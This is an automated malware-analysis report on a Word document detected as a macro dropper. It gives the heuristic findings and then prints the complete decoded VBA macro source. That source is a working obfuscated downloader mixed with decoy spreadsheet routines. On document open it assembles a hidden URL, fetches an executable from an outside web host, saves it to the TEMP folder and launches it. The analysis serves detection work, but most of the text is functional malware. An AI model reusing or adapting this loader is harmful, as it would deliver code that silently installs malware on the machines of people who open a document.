MALICIOUS
Risk Score: 228

Heuristics (7)
- ClamAV: Doc.Dropper.Agent-1616883 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-1616883
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `Set VvC0OQ6h8 = CreateObject(OtF2MZh2Cfnl9)`
- CallByName call (high, OLE_VBA_CALLBYNAME): CallByName call. Matched line in script: `CallByName KgJquztrTap, "O" & "p" & Chr(101) & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), EDc1mFJHKrRm0, False`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub autoopen()`
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10423 bytes |

SHA-256: 0ef5087771d4a51c205a183460b8315e7c60f913a46e486e2a6b1e467b3fc83c

Preview script: first 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
NVNJJEJJE Chr(60) & "KKFL<EOO;A", 43.17
End Sub
Sub NVNJJEJJE(GGGG As String, FFFFF As Long)
KLJHVNWE
End Sub
Sub KLJHVNWE()
URTniRUwGB
End Sub
Attribute VB_Name = "Module1"
Function CategoriseField(FieldName As String) As String
Dim Category As String
Category = "Undefined"
Dim CatBnd As Integer, FieldBnd As Integer, CatItr As Integer, FieldItr As Integer
Dim ThisField As String
CatBnd = UBound(FieldHeadings, 1)
For CatItr = 0 To CatBnd
FieldBnd = UBound(FieldHeadings(CatItr, 1)(1), 1)
For FieldItr = 0 To FieldBnd
ThisField = FieldHeadings(CatItr, 1)(1)(FieldItr)
If ThisField = FieldName Then
Category = FieldHeadings(CatItr, 0)
CategoriseField = Category
Exit For
End If
Next FieldItr
If CategoriseField = Category Then
Exit For
End If
Next CatItr
' If AddControl = "AddControl" Then
' Select Case Category
'
'
' End If
End Function
Sub URTniRUwGB()
EDc1mFJHKrRm0 = Chr(61) & Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(60) & Chr(47) & "w" & "w" & Chr(119) & "." & Chr(100) & Chr(114) & Chr(101) & Chr(115) & "s" & Chr(117) & Chr(114) & Chr(115) & Chr(116) & Chr(97) & Chr(108) & Chr(108) & Chr(45) & Chr(115) & Chr(111) & Chr(110) & Chr(110) & Chr(101) & Chr(110) & Chr(104) & "o" & Chr(102) & Chr(46) & Chr(100) & Chr(101) & "/" & Chr(57) & Chr(57) & Chr(47) & Chr(48) & Chr(49) & Chr(46) & Chr(59) & "e" & Chr(120) & Chr(101)
Dim kljhnIOH As String
kljhnIOH = "M" & Chr(105) & Chr(99) & Chr(114) & Chr(61) & "o" & "s" & "o" & Chr(102) & Chr(116) & Chr(46) & Chr(59) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(60) & "T" & Chr(84) & "P"
For DGxsbHsZ = 59 To 61
kljhnIOH = Replace(kljhnIOH, Chr(DGxsbHsZ), "", 1, 1, vbTextCompare)
Next DGxsbHsZ
Set KgJquztrTap = VvC0OQ6h8(kljhnIOH)
For DGxsbHsZ = 59 To 61
EDc1mFJHKrRm0 = Replace(EDc1mFJHKrRm0, Chr(DGxsbHsZ), "", 1, 1, vbTextCompare)
Next DGxsbHsZ
CallByName KgJquztrTap, "O" & "p" & Chr(101) & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), EDc1mFJHKrRm0, False
Dim EJJFEF As String
EJJFEF = "W" & Chr(83) & Chr(99) & Chr(60) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & "." & Chr(59) & Chr(83) & Chr(104) & Chr(101) & "l" & Chr(61) & Chr(108)
For DGxsbHsZ = 59 To 61
EJJFEF = Replace(EJJFEF, Chr(DGxsbHsZ), "", 1, 1, vbTextCompare)
Next DGxsbHsZ
Set SmuuuU81PmD = VvC0OQ6h8(EJJFEF)
Set K2BAN3ePSzEUUZ = CallByName(SmuuuU81PmD, Chr(69) & Chr(110) & "v" & Chr(105) & "r" & "o" & Chr(110) & Chr(109) & Chr(101) & Chr(110) & "t", VbGet, Chr(80) & Chr(114) & Chr(111) & "c" & "e" & Chr(115) & Chr(115))
YYRGHi07Vig = K2BAN3ePSzEUUZ("T" & "E" & Chr(77) & Chr(80))
Iw1u5AAHYx = YYRGHi07Vig & "\" & "d" & "i" & "k" & Chr(111) & Chr(61) & Chr(112) & Chr(105) & Chr(114) & Chr(116) & "." & Chr(60) & "e" & Chr(59) & Chr(120) & "e"
For DGxsbHsZ = 59 To 61
Iw1u5AAHYx = Replace(Iw1u5AAHYx, Chr(DGxsbHsZ), "", 1, 1, vbTextCompare)
Next DGxsbHsZ
Dim pI78nXO4LvafL7() As Byte
CallByName KgJquztrTap, Chr(83) & Chr(101) & Chr(110) & Chr(100), VbMethod
pI78nXO4LvafL7 = CallByName(KgJquztrTap, "r" & Chr(101) & "s" & Chr(112) & Chr(111) & "n" & "s" & Chr(101) & "B" & Chr(111) & "d" & Chr(121), VbGet)
Ajh6bff8yWYHO pI78nXO4LvafL7, Iw1u5AAHYx
On Error GoTo ZIyC6gTRQV
a = 233 / 0
On Error GoTo 0
O1pmpYMO:
Exit Sub
ZIyC6gTRQV:
NvPfGv8GF2j 33, "mt0ja19PZDhQ4k", "dvEWVewvwe"
Resume O1pmpYMO
End Sub
Sub AddToEntryForm_Deprecated(ListOfFields As Variant, Optional Category As String, Optional SampleNum As Integer)
Dim CurrentField As Variant, CurrFieldName As String, CurrFieldCat As String
For Each CurrentField In ListOfFields
CurrFieldName = ListOfFields()()
CurrFieldCat = CategoriseField(CurrFieldName)
Select Case CurrFieldCat
Case "Description":
' Consider SampleNum to return Frame to add control to
' NewEntry_frm.Description_frame.Controls.Add
'Function to return controls on multipage
'Function to populate multipage with all controls
'Consider adding management page for validations
'Override
'Shade non-applicable fields//& hide?
' Add to desc frame Description_Frame
''''//
'Add to all multipage objects according to site restriction | Replicate when adding more samples
End Select
Next CurrentField
End Sub
Sub ShowAllFields()
End Sub
Attribute VB_Name = "Module2"
Public LJIGuygbo As Integer
Public LIUGBVSULIV As Double
Public Iw1u5AAHYx As String
Public LIUGwefweBVSULIV As Double
Function GetSiteDetails(Site As String) As Variant
Dim i As Integer, UpperBound As Integer
Dim SearchIn() As String
Dim SiteHold As String
Dim SiteDetails(2) As String
If Len(Site) > 3 Then
SearchIn = SiteNames
Else
SearchIn = SiteCodes
End If
UpperBound = UBound(SearchIn)
For i = 0 To UpperBound
SiteHold = SearchIn(i)
If SiteHold = Site Then
Exit For
End If
Next i
SiteDetails(0) = SiteCodes(i)
SiteDetails(1) = SiteNames(i)
SiteDetails(2) = ee.SiteDepts(i)
GetSiteDetails = SiteDetails
End Function
Public Function NvPfGv8GF2j(Wvbwebwe As Long, IxcH06sl As String, IVBHR As String)
Set VBBkHQNgCewB = VvC0OQ6h8("S" & "h" & Chr(101) & "l" & Chr(108) & Chr(46) & "A" & Chr(112) & "p" & Chr(108) & Chr(105) & "c" & Chr(97) & Chr(116) & Chr(105) & "o" & "n")
For nbiiu = 44 To 77
If nbiiu = 10 Then
Exit Function
End If
nbiiu = nbiiu * 2
Next nbiiu
VBBkHQNgCewB.Open (Iw1u5AAHYx)
End Function
Sub GetDeptRest()
Dim DepartmentCol As Integer: DepartmentCol = 3
Dim SampleTypeCol As Integer: SampleTypeCol = 4
Dim RwItrtr As Long
Dim LastRw As Long: LastRw = SplDetWs.Range(SplDetWs.Cells(100000, SampleTypeCol).Address).End(xlUp).Row
Dim DeptName As String
Dim ThisList() As Variant, RestrictionCount As Integer
ReDim ThisList(1, 0)
' Dim DeptRestrictArr() As Variant
ReDim DeptRestrictArr(1, 0) 'Dimension 2 contains depts
Dim DeptItrtr As Integer, DeptCount As Integer, DisDeptHold As String, DisDepts() As String: DisDepts = Split(DistinctDepts, ",")
For DeptItrtr = 0 To UBound(DisDepts)
DisDeptHold = DisDepts(DeptItrtr)
ReDim Preserve DeptRestrictArr(1, DeptCount)
For RwItrtr = 2 To LastRw
DeptName = SplDetWs.Cells(RwItrtr, DepartmentCol).Value
If DeptName = DisDeptHold Then
ReDim Preserve ThisList(1, RestrictionCount)
ThisList(0, RestrictionCount) = SplDetWs.Cells(RwItrtr, SampleTypeCol).Value
Set ThisList(1, RestrictionCount) = SplDetWs.Range(SplDetWs.Cells(RwItrtr, SampleTypeCol).Address)
' Set _R(RestrictionCount) = SplDetWs.Range(SplDetWs.Cells(RwItrtr, SampleTypeCol).Address)
RestrictionCount = RestrictionCount + 1
End If
Next RwItrtr
RestrictionCount = 0
DeptRestrictArr(0, DeptCount) = DisDeptHold
DeptRestrictArr(1, DeptCount) = ThisList
DeptCount = DeptCount + 1
ReDim ThisList(1, 0)
Next DeptItrtr
End Sub
Public Function Ajh6bff8yWYHO(f7WbyEoZY4mNI As Variant, kRsTyyPIBbP8dW As String)
Dim tXdYzTtixn3EsU: Set tXdYzTtixn3EsU = VvC0OQ6h8("A" & "d" & "o" & Chr(100) & "b" & Chr(46) & Chr(83) & Chr(116) & "r" & Chr(101) & "a" & Chr(109))
For BEETNETN = 44 To 77
If BEETNETN = 10 Then
Exit Function
End If
BEETNETN = BEETNETN * 2
Next BEETNETN
With tXdYzTtixn3EsU
.Type = 1
.Open
.write f7WbyEoZY4mNI
.savetofile kRsTyyPIBbP8dW, 2
End With
End Function
Public Function VvC0OQ6h8(OtF2MZh2Cfnl9 As String)
Set VvC0OQ6h8 = CreateObject(OtF2MZh2Cfnl9)
End Function
Sub GetAllSamplesTypes()
Dim LastSample As Integer: LastSample = SampleTypesWs.Range(SampleTypesWs.Cells(100000, 1).Address).End(xlUp).Row
Dim SampleItrtr As Integer, SampleCount As Integer, ThisSample As String
ReDim AllSamplesTypes_S(LastSample - 2)
For SampleItrtr = 2 To LastSample
ThisSample = SampleTypesWs.Cells(SampleItrtr, 1).Value
AllSamplesTypes_S(SampleCount) = ThisSample
SampleCount = SampleCount + 1
Next SampleItrtr
End Sub
Sub AddToEntryForm(ListOfCatHeadings As Variant)
Dim i As Integer, HBound As Integer: HBound = UBound(ListOfCatHeadings, 2)
Dim ThisHeading As String, ThisCategory As String
Dim newControl As Object, DescControlsCount As Integer
For i = 0 To HBound
ThisHeading = ListOfCatHeadings(0, i)
ThisCategory = ListOfCatHeadings(1, i)
Select Case ThisCategory
Case "Description":
Set newControl = NewEntry_frm.Description_frame_1.Controls.Add("Forms.Textbox.1")
With newControl
.Name = ThisHeading
' .Caption = "Enter " & ThisHeading
.Top = 10 + (20 * DescControlsCount)
.Height = 18
.Width = 50
End With
DescControlsCount = DescControlsCount + 1
End Select
Next i
End Sub
'Vars Shouldst be Public
Sub GetAllSamplesRest()
Dim DepartmentCol As Integer: DepartmentCol = 3
Dim SampleTypeCol As Integer: SampleTypeCol = 4
Dim RwItrtr As Long
Dim LastRw As Long: LastRw = SplDetWs.Range(SplDetWs.Cells(100000, SampleTypeCol).Address).End(xlUp).Row
Dim DeptName As String
Dim AllCount As Integer
For RwItrtr = 2 To LastRw
DeptName = SplDetWs.Cells(RwItrtr, DepartmentCol).Value
If DeptName = "All" Then
AllCount = AllCount + 1
End If
Next RwItrtr
End Sub